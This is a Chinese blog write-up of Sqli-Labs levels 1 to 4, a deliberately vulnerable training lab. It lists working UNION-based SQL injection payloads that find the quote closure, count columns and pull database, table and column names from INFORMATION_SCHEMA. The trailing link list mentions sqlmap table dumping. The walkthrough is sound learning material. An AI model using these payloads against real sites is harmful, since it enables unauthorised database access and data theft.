Sqli-Labs闯关——更新中

最新推荐文章于 2023-12-05 18:39:19 发布
最新推荐文章于 2023-12-05 18:39:19 发布
阅读量262 收藏
点赞数
分类专栏: Sqli-Labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18669681/article/details/101113143
版权

Sqli-Labs闯关

Less-1

正常访问:
在这里插入图片描述
一、判断

1 and 1=2 //访问正常,不是数值查询

1' //报错,可能为sql字符注入

1' --+//返回正常,所以为单引号字符注入

注:
1、我使用的是 --+来注释sql后面的语句,+的作用是,它在解析的时候会被解析为空格,用来隔开 --与后面语句。
2、#注释也是可行的,但在浏览器的url中,他是被用来指导浏览器动作的,所以http请求并不包含它,只要将它转换为url编码%23.
3、 --’也可以

二、查询
1、查询列数
找一个临界值,这道题3正常,4错误,所以3就是那个临界值,说明这个表就是3列。

1'order by 3 --+

2、联合查询
找一个不存在的页面,查看是否有显示位,如图有2、3两个显示位。(因为mysql_fetch_array();这个函数,只会取出一行,如果要把所有结果取出来要用循环来取了在这儿我们只需要让union select前面的查询结果为空集,则后面的自然就成了第一行了,怎样让前面的成空集呢,只需要将id改为表里没有的,或者不合法的额就行)

999' union select 1,2,3 --+

在这里插入图片描述
2.1、查询库名
group_concat:显示所有内容并且相同内容只显示一次。

999' union select 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3 --+

在这里插入图片描述
2.2、查询表名

999' union select 1,2,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = (select DATABASE())) --+

在这里插入图片描述
2.3查找字段

999' union select 1,2,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNs where TABLE_NAME='emails') --+

注: union官方解释是用来把多个select语句的结果组合到一个结果集合中,且每列的数据类型必须相同。
group_concat也可以用limt替换。例如:999’ union select 1,2,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = (select DATABASE()) limit 0,1) --+

Less-2

和第一题几乎一样,只是没有了’的闭合

1 order by 3
999 union select 1,2,3
999 union select 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3
999 union select 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES),3
999 union select 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where  TABLE_SCHEMA=(select database())),3

Less-3

加’尝试,发现报错,查看报错语句’1’),所以猜测后台的查询语句为(’$id’)。
在这里插入图片描述
构造payload

1') order by 3 --+
999') union select 1,2,3 --+
999') union select 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA =(select DATABASE())),3 --+

Less-4

在参数加双引号报错,根据报错信息构造(") --+)
构造payload

") order by 3 --+
") union select 1,2,3 --+
") union select 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3 --+
") union select 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES),3 --+
") union select 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = (select DATABASE())),3 --+
江湖人称皮的很
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs通关详解(1-20关)
最新发布
2302_81105681的博客
04-11 2613
1.首先判断闭合方式在我之前发布的文章有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqli-labs闯关记录(1~65关)
qq_62540010的博客
01-04 3619
sql漏洞闯关记录笔记(1~15) 1.基本知识 首先我们先了解SQL注入是什么: SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界最普遍的漏洞之一,其实就是恶意用户通过在可提交给数据库的地方写入恶意代码,将数据库的数据提取出来。. 2.工具 在1~15关,我们要用到hacbar,burpsuit,国蚁剑,并且我用的是phpstudy2018来配置的Apache和mysql. 3.less 1,2,3,4 之所以把1234关一起破解,是因为它们属于同一类型,下面我们来看一看他们的不同
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs1-10关闯关心得与思路
m0_48294281的博客
03-08 6098
sqli-labs 1-11关闯关个人心得,欢迎交流指正。
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
在这个压缩包sqli-labs-php7可能包含一系列精心设计的练习,旨在帮助开发者理解和防御SQL注入攻击。通过这些练习,用户可以学习如何识别SQL注入的迹象,理解它们的工作原理,并掌握防御策略。在实践,这将提高...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs,你可以扮演黑客的角色,尝试找出并利用SQL注入漏洞,这有助于提升你的安全意识和测试技能。渗透测试工具如Burp Suite、Sqlmap等,可以辅助进行自动化扫描和漏洞利用。 五、漏洞环境 sqli-labs提供了...
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
sql-labs 闯关
m0_73189964的博客
06-09 334
sql前22关靶场详解
sqli-labs通关详解
m0_52051132的博客
10-15 6845
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
weixin_54626591的博客
12-05 2556
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
SQL注入学习——sqli-labs闯关(Basic Challenges)
未完成的歌~的博客
07-28 2653
今天开始学习 SQL 注入的相关知识,通过 sqli-labs 靶场来练习。靶场地址SQL注入(SQL Injection)是一种常见的 Web 安全漏洞,攻击者通过构造SQL语句与后台数据库进行交互,达到获取或修改一些敏感数据,或者利用潜在的数据库漏洞进行攻击的目的。何为盲注?盲注就是在 sql 注入过程sql 语句执行后,查询的数据不能回显到前端页面上。此时,我们需要利用一些特殊的方法来得到数据,这个过程称之为盲注。盲注主要分为三类:基于布尔的 SQL 盲注基于时间的 SQL 盲注。........
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs闯关指南--01-10关(非常详细)
weixin_44576725的博客
11-05 4415
注意: 如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。 另外-- (这里有一个空格,–空格)在SQL内表示注释,但在URL,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。 要学会利用报错信息来判断注入类型!!! Less-1 1、先测试and 1=2,回显正常,说明不是数值型注入 2、接着在id=1后添
sqli-labs 1-22闯关
小龙在线
09-21 407
系统函数 mysql> select version(); +-----------+ | version() | +-----------+ | 5.7.25 | +-----------+ 1 row in set (0.00 sec) mysql> select user(); +----------------+ | user() | +----------------+ | root@localhost | +----------------+ 1 row in
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值